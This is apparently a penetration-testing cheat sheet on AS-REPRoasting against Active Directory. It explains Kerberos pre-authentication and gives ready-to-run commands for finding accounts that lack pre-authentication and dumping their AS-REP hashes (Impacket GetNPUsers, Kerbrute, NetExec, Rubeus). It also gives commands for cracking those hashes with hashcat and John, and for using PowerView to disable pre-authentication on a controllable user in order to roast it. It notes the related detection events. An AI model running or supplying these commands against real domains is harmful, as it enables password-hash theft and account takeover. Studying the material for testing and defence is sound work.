AS-REPRoasting

AS-REPRoasting targets the first step of Kerberos authentication (the AS exchange) and is usually performed after obtaining a list of valid domain users.

Pre-authentication is a Kerberos feature that requires the client to prove knowledge of the account's password before the KDC issues a TGT. The client encrypts a timestamp with a key derived from the password and sends it in the AS-REQ; if the KDC can decrypt and validate the timestamp, the user has proven they know the password. This stops an unauthenticated party from obtaining anything it could take away and attack offline.

If an account has the Do not require Kerberos pre-authentication setting enabled (UF_DONT_REQUIRE_PREAUTH, 0x400000 in userAccountControl), anyone who can reach a DC can send an AS-REQ for that account without any proof of identity and receive an AS-REP. The AS-REP carries the TGT (encrypted with the krbtgt key, so of no use to us) plus an encrypted part holding the session key; that part is encrypted with a key derived from the account's password (the NT hash when RC4-HMAC, etype 23, is negotiated) and can therefore be cracked offline. The tools below request etype 23 by default, which is the format hashcat mode 18200 expects. On the DC each such request shows up as event 4768 with Pre-Authentication Type 0 and, for RC4, Ticket Encryption Type 0x17, which is what most detections key on.

Figure 1: The Kerberos authentication process.

Tools

Enumerate ASREPRoastable accounts with Impacket (needs valid domain credentials; it queries LDAP for accounts whose userAccountControl has UF_DONT_REQUIRE_PREAUTH set) or Kerbrute (no credentials needed; while validating usernames it prints the AS-REP hash of every account that does not require pre-authentication):

# Impacket's GetNPUsers script (prompts for <user>'s password; add -request to dump the hashes as well)
impacket-GetNPUsers <domain>/<user> -dc-ip <dc-ip>

# Kerbrute: validates the usernames in the wordlist and dumps AS-REP hashes for those without pre-auth
kerbrute userenum -d <domain> --dc <dc-ip> /opt/jsmith.txt

Execute the attack using Impacket or NetExec:

# Impacket's GetNPUsers script targeting a list of users (unauthenticated; writes hashcat-format lines to a file)
impacket-GetNPUsers <domain>/ -dc-ip <dc-ip> -no-pass -usersfile users.txt -format hashcat -outputfile asreproast.lst

# Impacket's GetNPUsers script targeting a single user
impacket-GetNPUsers <domain>/<targetUser> -dc-ip <dc-ip> -no-pass

# NetExec
nxc ldap <dc-ip> -u users.txt -p '' --asreproast asreproast.lst

For an example of ASREPRoasting using nxc see Sauna.

The obtained hashes can be cracked using Hashcat or JtR:

# Hashcat
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou.txt

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst

Targeted AS-REPRoast

If no account is vulnerable but we hold GenericWrite or GenericAll (or WriteProperty on userAccountControl) over a user object, we can set the UF_DONT_REQUIRE_PREAUTH bit (0x400000 = 4194304) in that user's userAccountControl, roast the account, and then clear the bit again. Because PowerView's -XOR flips the bit rather than setting it, running the same command a second time restores the original value; don't forget to do so after extraction. Note that the change is recorded on the DC as event 4738 (A user account was changed) with the old and new UAC values.

Force disable Kerberos PreAuth using PowerView:

Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose

Request encrypted AS-REP using Rubeus:

.\Rubeus.exe asreproast /user:<user> /outfile:<fileName> /nowrap /format:hashcat

Resources

  • Some amazing demonstrations of AS-REPRoasting (video, video)

  • What impacket-GetNPUsers does behind the scenes (video)
